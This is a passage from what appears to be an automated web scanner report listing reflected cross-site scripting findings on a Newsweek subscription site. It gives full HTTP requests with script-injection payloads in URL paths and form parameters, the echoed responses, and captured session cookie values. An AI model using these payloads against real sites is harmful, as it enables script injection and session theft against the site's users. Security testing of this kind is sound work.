Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:38 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.phpee8b8<script>alert(1)</script>15cf6cd2e68 is not found !</p>
...[SNIP]...

1.223. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18760<script>alert(1)</script>2fdacefe31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php/18760<script>alert(1)</script>2fdacefe31b HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php/18760<script>alert(1)</script>2fdacefe31b is not found !</p>
...[SNIP]...

1.224. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2f0a<script>alert(1)</script>0507321d56ca7bad9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrole2f0a<script>alert(1)</script>0507321d56ca7bad9/index.php?bill_state=&state= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:21 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 527
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole2f0a<script>alert(1)</script>0507321d56ca7bad9 is not found !</p>
...[SNIP]...

1.225. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e79bc<script>alert(1)</script>874d88a6ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrole79bc<script>alert(1)</script>874d88a6ba4/index.php HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole79bc<script>alert(1)</script>874d88a6ba4 is not found !</p>
...[SNIP]...

1.226. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 30811<script>alert(1)</script>cfd859f6c833810f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/30811<script>alert(1)</script>cfd859f6c833810f?bill_state=&state= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:51 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 779
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/30811<script>alert(1)</script>cfd859f6c833810f is not found !</p>
...[SNIP]...

1.227. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af631<script>alert(1)</script>29e38fed55d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/af631<script>alert(1)</script>29e38fed55d HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:23 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 774
Connection: close
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/af631<script>alert(1)</script>29e38fed55d is not found !</p>
...[SNIP]...

1.228. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the address request parameter is copied into the HTML document as plain text between tags. The payload d55cf<script>alert(1)</script>c5fd3f59eb2ff2768 was submitted in the address parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=d55cf<script>alert(1)</script>c5fd3f59eb2ff2768&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:37 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
d55cf<script>alert(1)</script>c5fd3f59eb2ff2768<br>
...[SNIP]...

1.229. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the address2 request parameter is copied into the HTML document as plain text between tags. The payload c64c8<script>alert(1)</script>4d4203c629d74c739 was submitted in the address2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=c64c8<script>alert(1)</script>4d4203c629d74c739&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:41 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20705

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
c64c8<script>alert(1)</script>4d4203c629d74c739<br>
...[SNIP]...

1.230. https://www.newsweeksubscriptions.com/FTcontrol/index.php [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the city request parameter is copied into the HTML document as plain text between tags. The payload cdee3<script>alert(1)</script>ed2a965c17315b456 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=cdee3<script>alert(1)</script>ed2a965c17315b456&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:46 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
cdee3<script>alert(1)</script>ed2a965c17315b456, AK <br>
...[SNIP]...

1.231. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c34ab'%3balert(1)//ef7adf60f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c34ab';alert(1)//ef7adf60f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TD/c34ab'%3balert(1)//ef7adf60f5eBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:42 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52795

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
;

   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";

url += '&off2on_login_url=/promo';

url += '&off2on_code=TD/c34ab';alert(1)//ef7adf60f5eBNAV';

       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=
...[SNIP]...

1.232. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da8a"><script>alert(1)</script>7daa882cfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TD/9da8a"><script>alert(1)</script>7daa882cfb0BNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:38 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52825

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="TD/9da8a"><script>alert(1)</script>7daa882cfb0BNAV">
...[SNIP]...

1.233. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 3de41<script>alert(1)</script>0f40ef1362bbb5b0 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=3de41<script>alert(1)</script>0f40ef1362bbb5b0&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:32 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20700

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
3de41<script>alert(1)</script>0f40ef1362bbb5b0<br>
...[SNIP]...

1.234. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the off2on_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d39"><script>alert(1)</script>abae2437581 was submitted in the off2on_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TDBNAV63d39"><script>alert(1)</script>abae2437581 HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:13 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52823

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="TDBNAV63d39"><script>alert(1)</script>abae2437581">
...[SNIP]...

1.235. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the off2on_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fd5e'%3balert(1)//7e6518f439b was submitted in the off2on_code parameter. This input was echoed as 9fd5e';alert(1)//7e6518f439b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TDBNAV9fd5e'%3balert(1)//7e6518f439b HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:17 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52793

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...

   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";

url += '&off2on_login_url=/promo';

url += '&off2on_code=TDBNAV9fd5e';alert(1)//7e6518f439b';

       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=295,
...[SNIP]...

1.236. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33396"><script>alert(1)</script>3164ef74c97 was submitted in the off2on_login_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo33396"><script>alert(1)</script>3164ef74c97&off2on_code=TDBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:37:54 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52823

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_login_url" id="off2on_login_url" value="/promo33396"><script>alert(1)</script>3164ef74c97">
...[SNIP]...

1.237. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b713'%3balert(1)//66c9d26a207 was submitted in the off2on_login_url parameter. This input was echoed as 5b713';alert(1)//66c9d26a207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /FTcontrol/index.php?off2on_login_url=/promo5b713'%3balert(1)//66c9d26a207&off2on_code=TDBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:37:58 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52793

<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
